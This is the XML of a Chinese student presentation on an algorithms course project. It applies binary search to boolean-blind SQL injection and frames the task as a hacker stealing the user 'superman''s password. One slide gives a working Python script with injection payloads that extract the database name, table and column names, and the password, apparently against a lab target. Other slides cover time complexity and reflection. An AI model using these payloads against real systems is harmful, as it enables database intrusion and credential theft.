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1" r:id="rId6"/>
    <p:sldId id="260" r:id="rId7"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3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1F3-74FD-4BBE-8BEB-FFE9F3BA67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BCF1-1102-4B40-AB3D-3CF6C7A9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1F3-74FD-4BBE-8BEB-FFE9F3BA67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BCF1-1102-4B40-AB3D-3CF6C7A9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1F3-74FD-4BBE-8BEB-FFE9F3BA67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BCF1-1102-4B40-AB3D-3CF6C7A9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1F3-74FD-4BBE-8BEB-FFE9F3BA67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BCF1-1102-4B40-AB3D-3CF6C7A9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1F3-74FD-4BBE-8BEB-FFE9F3BA67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BCF1-1102-4B40-AB3D-3CF6C7A9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1F3-74FD-4BBE-8BEB-FFE9F3BA67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BCF1-1102-4B40-AB3D-3CF6C7A9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1F3-74FD-4BBE-8BEB-FFE9F3BA67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BCF1-1102-4B40-AB3D-3CF6C7A9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1F3-74FD-4BBE-8BEB-FFE9F3BA67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BCF1-1102-4B40-AB3D-3CF6C7A9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1F3-74FD-4BBE-8BEB-FFE9F3BA67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BCF1-1102-4B40-AB3D-3CF6C7A9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1F3-74FD-4BBE-8BEB-FFE9F3BA67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BCF1-1102-4B40-AB3D-3CF6C7A9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1F3-74FD-4BBE-8BEB-FFE9F3BA67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BCF1-1102-4B40-AB3D-3CF6C7A9CD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BE1F3-74FD-4BBE-8BEB-FFE9F3BA67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6BCF1-1102-4B40-AB3D-3CF6C7A9CD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43051"/>
            <a:ext cx="7772400" cy="1571635"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>二分法实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>注入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795" y="3717290"/>
            <a:ext cx="6400800" cy="1752600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p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928694"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:br>
              <a:rPr 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算法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="49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设计</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4900" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="49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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="342265" eaLnBrk="0" fontAlgn="auto"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zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>你是一名专业的黑客，计划盗取superman的密码。superman的密码设计的十分复杂，既包含大小写字母数字还有特殊符号，所以靠暴力破解几乎不可能成功。一次偶然的机会，你发现这个系统存在SQL布尔注入，根据页面是否正确显示来判断我们构造的语句是否正确执行。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="342265" eaLnBrk="0" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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利用二分法枚举可能出现的字符获取数据库名、表名、字段名等，从而从数据库中获取superman的密码。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b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关键代码展示</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
            </a:b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fontScale="25000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t> while True:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>            i = i + 1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>            low = 32</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>            high = 127</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>            while low &lt; high:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>                mid = (low + high) // 2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>                if k==0:payload = f"1' or ascii(substr((select database()),{i},1))&gt;{mid}#"</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>                if k==1:payload = f"1' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='{schema}'),{i},1))&gt;{mid}#"</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>                if k==2:payload = f"1' or ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='{table}' and table_schema='{schema}'),{i},1))&gt;{mid}#"</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>                if k==3:payload = f"1' or ascii(substr((select password from {schema}.{table} where username='{user}'),{i},1))&gt;{mid}#"</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>                data = {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>                    'uname': payload,</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>                    'passwd': 'admin',</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>                    'submit': "Submit"</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>                }#POST传参发包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>                r = requests.post(url=url, data=data)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>                r.encoding = "utf-8"#防止乱码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>                if 'flag' not in r.text:#判断有没有该词，没有说明原来语句值为假</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>                    high = mid</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>                else:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>                    low = mid + 1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>                time.sleep(0.2)#放慢速度防止服务器崩溃</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>            if low != 32:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>                result += chr(low)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>                print(time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time())), '努力加载中......')</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>                print(result)#输出结果</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>            else:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>                break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br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:b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系统性能或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none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算法时间复杂性分析</a:t>
            </a:r>
            <a:b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/>
              <a:t>               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>二分查找操作的数据集是一个有序的数据集。开始时，先找出有序集合中间的那个元素。如果此元素比要查找的元素大，就接着在较小的一个半区进行查找；反之，如果此元素比要找的元素小，就在较大的一个半区进行查找。在每个更小的数据集中重复这个查找过程，直到找到要查找的元素或者数据集不能再分割。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>二分查找的平均时间复杂度和最坏时间复杂度均为O(log n)。因为在二分搜索过程中，算法每次都把查询的区间减半，所以对于一个长度为n的数组，至多会进行O(log n)次查找。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总结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pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>本次课程设计我做的是二分法实现SQL盲注，该问题使用二分答案的方法解决，通过完成这个课程设计，让我对二分答案有了更加深刻的理解。二分查找的平均时间复杂度和最坏时间复杂度均为O(log n)。因为在二分搜索过程中，算法每次都把查询的区间减半，所以对于一个长度为n的数组，至多会进行O(log n)次查找。这种做法在数据范围大时特别有用。我对二分答案的使用有了进一步的认识。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无论是在计算机专业还是人工智能专业，算法分析与设计都是一门非常重要的专业。虽然算法分析与设计这门课在大二就结束了，但是我对算法的学习仍将继续。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总的来说，通过这次课程设计，增加了我对二分答案的理解，提高了我解决复杂工程的能力。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80691518-cf36-41db-a711-d88690092e9c"/>
  <p:tag name="COMMONDATA" val="eyJoZGlkIjoiZWEwYmE5ODI3MTk5OGEzY2VlMDk3NmM5YWQ2MzZjZT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2199</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>全屏显示(4:3)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华文新魏</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Office 主题</vt:lpstr>
      <vt:lpstr>二分法实现SQL注入</vt:lpstr>
      <vt:lpstr> 算法设计 </vt:lpstr>
      <vt:lpstr> 关键代码展示 </vt:lpstr>
      <vt:lpstr> 系统性能或算法时间复杂性分析 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项目名称</dc:title>
  <dc:creator>91496</dc:creator>
  <cp:lastModifiedBy>学霸诸葛亮</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-01-06T13:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-13T11:39:46Z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4BBF3F43BFF443D29F9CF154E1220651</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-11.1.0.13703</vt:lpwstr>
  </property>
</Properties>
</file>